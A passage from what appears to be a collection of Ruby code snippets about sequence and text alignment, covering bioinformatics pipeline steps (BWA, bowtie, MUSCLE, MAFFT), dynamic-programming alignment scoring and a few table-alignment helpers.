obj5.runCommand()\n sortBamJobName = obj5.getJobName() \n\n # Mark duplicates on BAM\n markedDupCmd = markDupCommand()\n obj6 = Scheduler.new(@fcAndLane + \"_markDupBam\", markedDupCmd)\n obj6.setMemory(@lessMemory)\n obj6.setNodeCores(@minCpuCores)\n obj6.setPriority(@priority)\n obj6.setDependency(sortBamJobName)\n obj6.runCommand()\n markedDupJobName = obj6.getJobName()\n prevCmd = markedDupJobName\n\n # Filter out phix reads\n if @filterPhix == true\n phixFilterCmd = filterPhixReadsCmd(@markedBam)\n objX = Scheduler.new(@fcAndLane + \"_phixFilter\", phixFilterCmd)\n objX.setMemory(@lessMemory)\n objX.setNodeCores(@minCpuCores)\n objX.setPriority(@priority)\n objX.setDependency(prevCmd)\n objX.runCommand()\n phixFilterJobName = objX.getJobName()\n prevCmd = phixFilterJobName\n end\n\n # Fix mate information for paired end FC\n if @isFragment == false\n fixMateCmd = fixMateInfoCmd()\n objY = Scheduler.new(@fcAndLane + \"_fixMateInfo\" + @markedBam, fixMateCmd)\n objY.setMemory(@lessMemory)\n objY.setNodeCores(@minCpuCores)\n objY.setPriority(@priority)\n objY.setDependency(prevCmd)\n objY.runCommand()\n fixMateJobName = objY.getJobName()\n prevCmd = fixMateJobName\n end\n\n # Fix unmapped reads. When a read aligns over the boundary of two\n # chromosomes, BWA marks this read as unmapped but does not reset CIGAR to *\n # and mapping quality zero. This causes picard's validator to complain.\n # Hence, we fix that anomaly here.\n fixCIGARCmd = buildFixCIGARCmd(@markedBam)\n fixCIGARObj = Scheduler.new(@fcAndLane + \"_fixCIGAR\" + @markedBam, fixCIGARCmd)\n fixCIGARObj.setMemory(@lessMemory)\n fixCIGARObj.setNodeCores(@minCpuCores)\n fixCIGARObj.setPriority(@priority)\n fixCIGARObj.setDependency(prevCmd)\n fixCIGARObj.runCommand()\n fixCIGARJobName = fixCIGARObj.getJobName()\n prevCmd = fixCIGARJobName\n\n # Calculate Alignment Stats\n mappingStatsCmd = calculateMappingStats()\n obj7 = Scheduler.new(@fcAndLane + \"_AlignStats\", mappingStatsCmd)\n obj7.setMemory(@lessMemory)\n obj7.setNodeCores(@minCpuCores)\n obj7.setPriority(@priority)\n obj7.setDependency(prevCmd)\n obj7.runCommand()\n runStatsJobName = obj7.getJobName()\n prevCmd = runStatsJobName\n\n if @chipDesign != nil && !@chipDesign.empty?()\n captureStatsCmd = buildCaptureStatsCmd()\n capStatsObj = Scheduler.new(@fcAndLane + \"_CaptureStats\", captureStatsCmd)\n capStatsObj.setMemory(@lessMemory)\n capStatsObj.setNodeCores(@minCpuCores)\n capStatsObj.setPriority(@priority)\n capStatsObj.setDependency(prevCmd)\n capStatsObj.runCommand()\n capStatsJobName = capStatsObj.getJobName()\n prevCmd = capStatsJobName\n end\n\n # Hook to run code after final BAM is generated\n runPostRunCmd(prevCmd)\n end",
"def muscle_sequence2(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n aln_ref = fasta_to_hash(temp_aln)[\">ref\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return [aln_ref, aln_seq]\nend",
"def muscle_sequence(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return aln_seq\nend",
"def warp_aligned\n\n align = params[:align]\n append = params[:append]\n destmap = Map.find(params[:destmap])\n\n if destmap.status.nil? or destmap.status == :unloaded or destmap.status == :loading\n flash.now[:notice] = \"Sorry the destination map is not available to be aligned.\"\n redirect_to action: \"show\", id: params[:destmap]\n elsif align != \"other\"\n\n if params[:align_type] == \"original\"\n destmap.align_with_original(params[:srcmap], align, append )\n else\n destmap.align_with_warped(params[:srcmap], align, append )\n end\n flash.now[:notice] = \"Map aligned. You can now rectify it!\"\n redirect_to action: \"warp\", id: destmap.id\n else\n flash.now[:notice] = \"Sorry, only horizontal and vertical alignment are available at the moment.\"\n redirect_to action: \"align\", id: params[:srcmap]\n end\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def perform\n result_file = nil\n \n # Create the alignment files\n result_file = generate_alignment if @task == :all || @task == :align\n \n # Identify the clusters\n result_file = identify_clusters if @task == :all || @task == :cluster\n \n result_file\n end",
"def alignment_strings(start=0,stop=self.length,organisms=nil) \n answer = Array.new \n self.genomic_aligns.each do |contig|\n if organisms.nil? # if no organisms were specified to limit the results\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name)) unless sequence.nil?\n else\n if organisms.include?(contig.find_organism)\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name))\n end\n end \n end\n return answer \n end",
"def align_local(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = 0\n end\n for j in 0..y\n tab[0][j] = 0\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert, 0].max\n end\n end\n\n @table = tab\n value = 0\n @lok_max_coordinates = [0,0]\n for i in 1..x\n for j in 1..y\n if tab[i][j] >= value\n value = tab[i][j]\n @lok_max_coordinates = [i, j]\n end\n end\n end\n EvaluatedProtein.new(protein, value)\n end",
"def alignment= value\n raise unless ALIGNMENTS.any? {|a| a == value }\n @alignment = value\n end",
"def align; end",
"def align; end",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def column_align colindex, lrc=:NONE\n if lrc == :NONE\n return get_column(colindex).align\n #return @calign[colindex]\n end\n raise ArgumentError, \"wrong alignment value sent\" if ![:right, :left, :center].include? lrc\n get_column(colindex).align = lrc\n self\n end",
"def display_disorder_annotated_alignment\n thread_num = 65\n @display_array = Array.new\n @max_count = 0\n @contact_consensus_array = Array.new\n @seq_contact_count = Alignment.all(:alignment_name => Alignment.get(params[:id]).alignment_name).count\n longest_alignment = 0;\n alignment_array = []\n @alignment_name = Alignment.get(params[:id]).alignment_name\n Alignment.all(:alignment_name => Alignment.get(params[:id]).alignment_name, \n :order => [:align_order.asc]).each do |alignment|\n puts alignment.alignment_sequence.length\n if alignment.alignment_sequence.length > longest_alignment\n longest_alignment = alignment.alignment_sequence.length\n end\n alignment_array << alignment\n end\n for i in 0..longest_alignment+1\n @contact_consensus_array[i] = Array.new(@seq_contact_count, 0)\n end\n #@contact_consensus_array = Array.new(longest_alignment, Array.new(@seq_contact_count,0))\n puts @contact_consensus_array.length\n puts \"Into The Threads\"\n thread_array=[]\n thread_num.times do |i|\n thread_array[i] = Thread.new{\n while alignment_array.length > 0 do\n alignment = alignment_array.pop\n sequence= alignment.sequence\n display_hash = Hash.new\n alignment_color_array = Array.new \n cur_position = 0 \n orig_position = 0\n AlignmentPosition.all(:alignment_id => alignment.align_id, \n :order => [:alignment_position_id.asc]).each do |position|\n if position.position == cur_position\n amino_acid = sequence.a_asequences.first(:original_position=>orig_position) #AAsequence.first(:id => position.aasequence_id)\n unless amino_acid.nil?\n alignment_color_array[cur_position] = residue_color(amino_acid.disorder_consensus, 0)\n if @contact_consensus_array[cur_position][alignment.align_order].nil?\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n if amino_acid.disorder_consensus >= 0.5\n @contact_consensus_array[cur_position][alignment.align_order] = @contact_consensus_array[cur_position][alignment.align_order] + 1\n end\n else\n puts \"Amino Acid doesn't exits: #{sequence.abrev_name} | #{cur_position}:#{orig_position}\" \n alignment_color_array[cur_position] = residue_color(0, 0)\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n else\n while position.position > cur_position\n alignment_color_array[cur_position] = \"FFFFFF\"\n cur_position += 1\n end\n amino_acid = sequence.a_asequences.first(:original_position=>orig_position) #AAsequence.first(:id => position.aasequence_id)\n unless amino_acid.nil?\n alignment_color_array[cur_position] = residue_color(amino_acid.disorder_consensus, 0)\n if @contact_consensus_array[cur_position].nil?\n puts \"OH no \" + alignment.sequence.abrev_name\n end\n if @contact_consensus_array[cur_position][alignment.align_order].nil?\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n if amino_acid.disorder_consensus >= 0.5\n @contact_consensus_array[cur_position][alignment.align_order] = @contact_consensus_array[cur_position][alignment.align_order] + 1\n end\n else\n puts \"Amino Acid doesn't exits: #{sequence.abrev_name} | #{cur_position}:#{orig_position}\" \n alignment_color_array[cur_position] = residue_color(0, 0)\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n end\n cur_position += 1\n orig_position +=1\n end \n puts display_hash[\"name\"] = Sequence.first(:seq_id => alignment.seq_id).abrev_name \n display_hash[\"alignment\"] = alignment_color_array\n @display_array[alignment.align_order] = display_hash\n if @max_count < cur_position\n @max_count = cur_position\n end\n end\n }\n end\n thread_array.map{|t| t.join}\n\n @contact_consensus_array = @contact_consensus_array.map{|a| a.inject(0){|sum,item| sum + item}}\n @cur_position = 0\n @tick_counter = 0\n @alignment_tick_array = Array.new\n while @cur_position <= @max_count\n @cur_position += 1\n @tick_counter += 1\n if @tick_counter != 25\n @alignment_tick_array << \"FFFFFF\"\n else\n @alignment_tick_array << \"000000\"\n @tick_counter = 0\n end\n end\n @display_hash = Hash.new\n @display_hash[\"name\"] = \"\"\n @display_hash[\"alignment\"] = @alignment_tick_array \n @display_array << @display_hash\n if params[:aa_length].nil?\n @aa_length = 400\n else\n @aa_length = params[:aa_length].to_i\n end\n @ranges = (@max_count/@aa_length)\n\n end",
"def aligned_position \n \n cigar_line = \"#{self.cigar_line}\"\n \n x = cigar_line.slice!(/^[0-9]*/)\n char = cigar_line.slice!(/^[A-Z]/)\n \n x.nil? ? x = 1 : x = x.to_i\n char == \"X\" ? start = x : start = 0\n \n char = cigar_line.slice!(/[A-Z]$/)\n y = cigar_line.slice!(/[0-9]*$/)\n \n if y.nil?\n y = 1\n else\n y = y.to_i\n end\n \n if char == \"X\"\n stop = self.genomic_align_block.length - y\n else\n stop = self.genomic_align_block.length\n end\n answer = Array.new\n answer.push(start)\n answer.push(stop)\n return answer\n \n end",
"def alignment_of(member)\n self.class.alignment_of(member)\n end",
"def ref_seq\n\n if _ref_seq\n _ref_seq\n else\n seq = Reference.ref_seq(chromosome, start, stop, strand)\n update_attributes(:_ref_seq => seq)\n seq\n end\n\n end",
"def alignments\n map { |alignment| alignment }\n end",
"def print_align(io, sequences, labels, opts={})\n opts = {:cutoff => 70, :start => 0, :chars => 20}.merge(opts)\n (start, length, chars) = opts.values_at(:start, :cutoff, :chars)\n spacer = \" \"\n\n if opts[:template]\n sequences.unshift(opts[:template])\n labels.unshift(opts[:template_label])\n end\n\n all_stats = Array.new(6,0)\n loop do\n fin = false\n\n max_length = 0\n lines = []\n consensus_line = \"\"\n fragments = sequences.map do |string|\n fin = (start >= string.length )\n break if fin\n\n string_frag = string[start, length]\n\n string_frag\n end ; break if fin\n\n doubles = fragments.zip(labels)\n\n doubles = doubles.select {|frag, _| (frag.size > 0) && (frag =~ /[^-]/) }\n\n max_length = doubles.map {|frag, _| frag.size }.max\n\n (cs, stats) = consensus_string_and_stats( doubles.map {|frag,_| frag } )\n all_stats = all_stats.zip(stats).map {|a,b| a + b }\n\n doubles.push( [cs, \"<CONSENSUS>\"] )\n\n lines = doubles.map {|frag, label| [exactly_chars(label, chars),spacer,frag].join }\n\n ## the counters at the top of the line\n start_s = start.to_s\n finish_s = (start + max_length).to_s\n count_line_gap = max_length - (start_s.size + finish_s.size)\n count_line = [start_s, spacer]\n unless count_line_gap < 1\n count_line << \" \" * count_line_gap\n end\n io.puts [exactly_chars(\"\", chars), spacer, count_line.join].join\n\n io.puts lines.join(\"\\n\")\n\n io.puts \" \" # separator between lines\n start += length\n end\n end",
"def left_align\n @align = nil\n end",
"def fetch_ancestral_sequence(start=0,stop=self.length)\n self.genomic_aligns.select{|c| c.find_organism == \"Ancestral sequences\"}.each do |contig|\n puts contig.find_organism\n #return contig.aligned_sequence[start..stop]\n end\n end",
"def align_column n, alignment\n r = rows\n column(n).each_with_index do |col, i|\n cell = r[i][n]\n cell.alignment = alignment unless cell.alignment?\n end\n end",
"def collaps_qnames(input_file, output_file)\n\t\n\t\tloci = {}\n\t\n\t\t# Read candidate loci and count reads/locus\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\t\tqname = line[0]\n\t\t\tbase = qname.gsub(/\\/[1,2]/, '')\n\t\t\tpos_a = line[1..3].join(':')\n\t\t\tpos_b = line[4..6].join(':')\n\t\t\tpos = [pos_a, pos_b].join(':')\n\n\t\t\talignment_length = line[-1]\n\t\n\t\t\tif !loci.has_key?(pos)\n\t\t\t\tloci[pos] = {:count => 1, :qnames => [qname], :l => alignment_length}\n\t\t\telse \n\t\t\t\tloci[pos][:qnames] << qname\n\t\t\t\tloci[pos][:count] += 1\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tloci.each do |pos, v| \n\t\t\t\toutput.puts [pos.split(':'), v[:count], v[:l], v[:qnames].join(';')].join(\"\\t\") if v[:count] > 0\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Collapsed anchor pairs to single loci.\"\n\tend",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def get_clustalw \n answer = []\n self.homology_members.each do |hm|\n answer.push(hm.aligned_sequence)\n end \n return Bio::Alignment::OriginalAlignment.new(answer) \n end",
"def add(alignment, source_index, dest_index)\n @indexes[alignment] = [source_index, dest_index]\n [source_index, dest_index].each do |index|\n @alignments[index] = alignments.fetch(index, Set.new) << alignment\n end\n end",
"def gen_random_seqs(msa_file,noalign_random_file)\n\n #read simple fasta file\n puts `pwd`\n\n\n len_align = 0;\n\n #create new OriginalAlignment\n oa = Bio::Alignment::OriginalAlignment.new()\n #load sequences from file\n Bio::FlatFile.open(Bio::FastaFormat, msa_file) { |ff|\n #store sequence from file\n ff.each_entry { |x| oa.add_seq(x.seq,x.entry_id) }\n }\n\n #remove gaps\n oa.remove_all_gaps!\n #determine ungaped length\n #oa.each_seq { |seq| len_align=[len_align,seq.length].max }\n #show it\n len_align = oa.alignment_length\n\n #store random sequence\n oa = oa.alignment_collect {|key| key = gen_rand_dna_seq(len_align) }\n\n #puts oa.output(:fasta)\n\n #puts result on disk\n simple_seqs_file = File.new(noalign_random_file,\"w\")\n simple_seqs_file.puts(oa.output_fasta)\n simple_seqs_file.close;\n \n end",
"def align_global(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = @@d * i\n end\n for j in 0..y\n tab[0][j] = @@d * j\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert].max\n end\n end\n\n @table = tab\n value = tab[x][y]\n EvaluatedProtein.new(protein, value)\n end",
"def buildAlignCommand(readFile, outputFile)\n cmd = \"time \" + @bwaPath + \" aln -t \" + @cpuCores.to_s + \" -I \" +\n @reference + \" \" + readFile + \" > \" + outputFile\n return cmd\n end",
"def mafft_consensus(reads, percentID)\n tmp = Tempfile.new(\"maffttmp\", @temp_path)\n reads.each.with_index(1) do |read_inf, index|\n tmp.puts \">#{read_inf.type}_#{read_inf.start_pos}_#{read_inf.end_pos}-v#{index}\"\n tmp.puts read_inf.seq.upcase\n end\n tmp.flush\n\n env = {}\n if @temp_path && !@temp_path.empty?\n env['TMPDIR'] = @temp_path\n end\n cmd = [@mafft, '--nuc', '--ep', '0.0', '--op', '1', '--genafpair', '--maxiterate', '1000', tmp.path]\n res, err, status = Open3.capture3(env, *cmd)\n unless status.success?\n STDERR.puts(\"mafft stderr:\")\n STDERR.puts(err)\n report_error(status, cmd.join(' '), [tmp]) if status.success?\n end\n tmp.close(true)\n\n # makeing a consensus seq\n align_reads = {}\n res.split(\"\\n>\").each do |align_read|\n align_read_ary = align_read.split(\"\\n\")\n if align_read_ary.last == \">\"\n if align_read_ary[0].start_with?('>')\n read_name = align_read_ary[0][1..-1]\n else\n read_name = align_read_ary[0]\n end\n align_reads[read_name] = align_read_ary[1..-2].join(\"\")\n else\n read_name = align_read_ary[0]\n align_reads[read_name] = align_read_ary[1..-1].join(\"\")\n end\n end\n\n aln = Bio::Alignment.new(align_reads.values.sort)\n align_reads_names = []\n consensus = aln.consensus_string(percentID, gap_mode: -1) # threshold =%id\n\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtggAGGtcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n check = Hash.new(0) # depth1の場所を探し、trimする\n align_reads.each do |read_name, align_seq|\n read_name = read_name[1..-1] if read_name.start_with?(\">\")\n align_seq.each_char.with_index{ |allele, num| check[num] += 1 if allele != \"-\" }\n align_reads_names << [align_seq, read_name]\n end\n max_num = check.keys.max\n\n new_cons = []\n if align_reads_names.size > 2 # multiple-alignmentの場合\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # ---tcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # 最初の数文字と最後の数文字はdepth1でも消さない\n # >最初\n bef_index = -1\n flg = 0\n check.sort_by { |k, v| k }.each do |index, cnt|\n if flg == 0 and cnt == 1\n bef_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n # >最後\n aft_index = max_num + 1\n flg = 0\n check.sort_by{|k,v|k}.reverse.each do |index, cnt|\n if flg == 0 and cnt == 1\n aft_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n\n # align_reads_namesのチェック\n align_reads_names.each do |align_seq, read_name|\n new_align_seq = \"\"\n align_seq.each_char.with_index do |seq, num|\n if num <= bef_index || aft_index <= num # 最初と最後のdepth1\n new_align_seq += seq\n elsif check[num] != 1\n new_align_seq += seq\n end\n end\n end\n consensus.each_char.with_index do |seq, num|\n if num <= bef_index or aft_index <= num # 最初と最後のdepth1\n new_cons << seq\n elsif check[num] != 1\n new_cons << seq\n end\n end\n\n # pairwise-alignmentのときは特になにもせずO.K.\n else\n new_cons = [consensus]\n end\n new_cons = new_cons.join(\"\")\n\n return new_cons, reads.size\n end",
